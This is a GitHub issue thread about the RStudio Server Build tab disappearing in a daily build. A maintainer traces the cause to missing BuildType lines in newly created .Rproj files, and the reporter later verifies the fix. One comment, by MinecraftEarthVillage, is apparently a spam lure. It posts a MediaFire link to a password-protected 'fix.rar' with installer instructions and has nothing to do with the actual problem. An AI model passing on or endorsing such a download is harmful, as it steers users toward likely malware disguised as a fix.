### ISSUE TITLE
Build tab is missing

### ISSUE THREAD

**Issue by astayleraz** [rstudio/rstudio#15086]
### System details

    RStudio Edition : Server 
    RStudio Version : 2024.10.0-daily+96
    OS Version      : ubuntu22
    R Version       : 4.4.0

### Steps to reproduce the problem

1. Log in and observe the `Build` tab.

**Note**: The test did Pass in build `2024.10.0-daily+94`. `test_grid_convert_height` is the test that caught this regression. 

### Describe the problem in detail
Build tab is missing and even shows it should be showing in the pane layout.
![Screenshot 2024-08-26 at 11 03 22 AM](https://github.com/user-attachments/assets/9df0cdcb-9f53-4bc5-9e5b-964e21a3fb53)

### Describe the behavior you expected
The `Build` tab should show.
![Screenshot 2024-08-26 at 11 18 09 AM](https://github.com/user-attachments/assets/cf8468ba-a5d0-41b8-9fdc-1becd9cf1845)

- [x] I have read the guide for [submitting good bug reports](https://github.com/rstudio/rstudio/wiki/Writing-Good-Bug-Reports).
- [x] I have installed the latest version of RStudio, and confirmed that the issue still persists.
- [ ] If I am reporting an RStudio crash, I have included a [diagnostics report](https://support.posit.co/hc/en-us/articles/200321257-Running-a-Diagnostics-Report).
- [x] I have done my best to include a minimal, self-contained set of instructions for consistently reproducing the issue.

**Comment by MinecraftEarthVillage** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by ronblum** [comment]
@astayleraz Thank you for raising this! We'll consider this as we continue development of RStudio.

**Comment by gtritchie** [comment]
Confirmed this was working in daily+94 and failing in daily+96 by creating a new R Package project in each. I didn't have a .95 build for the platform I'm using.

It's the project that's being created that's the problem.

An R Package project created in .94 then opened in .96 shows the Build tab just fine. Create the project in .96 and open it in .94 and there's no Build tab.

.Rproj file created via `+94`:

```
Version: 1.0

RestoreWorkspace: Default
SaveWorkspace: Default
AlwaysSaveHistory: Default

EnableCodeIndexing: Yes
UseSpacesForTab: Yes
NumSpacesForTab: 2
Encoding: UTF-8

RnwWeave: Sweave
LaTeX: pdfLaTeX

AutoAppendNewline: Yes
StripTrailingWhitespace: Yes

BuildType: Package
PackageUseDevtools: Yes
PackageInstallArgs: --no-multiarch --with-keep.source
```

And via `+96`:

```
Version: 1.0

RestoreWorkspace: Default
SaveWorkspace: Default
AlwaysSaveHistory: Default

EnableCodeIndexing: Yes
UseSpacesForTab: Yes
NumSpacesForTab: 2
Encoding: UTF-8

RnwWeave: Sweave
LaTeX: pdfLaTeX

AutoAppendNewline: Yes
StripTrailingWhitespace: Yes
```

Note that the broken one is missing the final three lines starting with `BuildType: Package`.

**Comment by astayleraz** [comment]
#
### Verified Fixed
    RStudio Edition    :   Server / Workbench
    RStudio Version(s) : 2024.10.0-daily+106
    OS Version         : Ubuntu22

### Test scenario(s) 

Verified build tab is now showing.

### Automated tests 

I re-enabled the test for this, and it is passing now. 

Thanks for the quick fix!
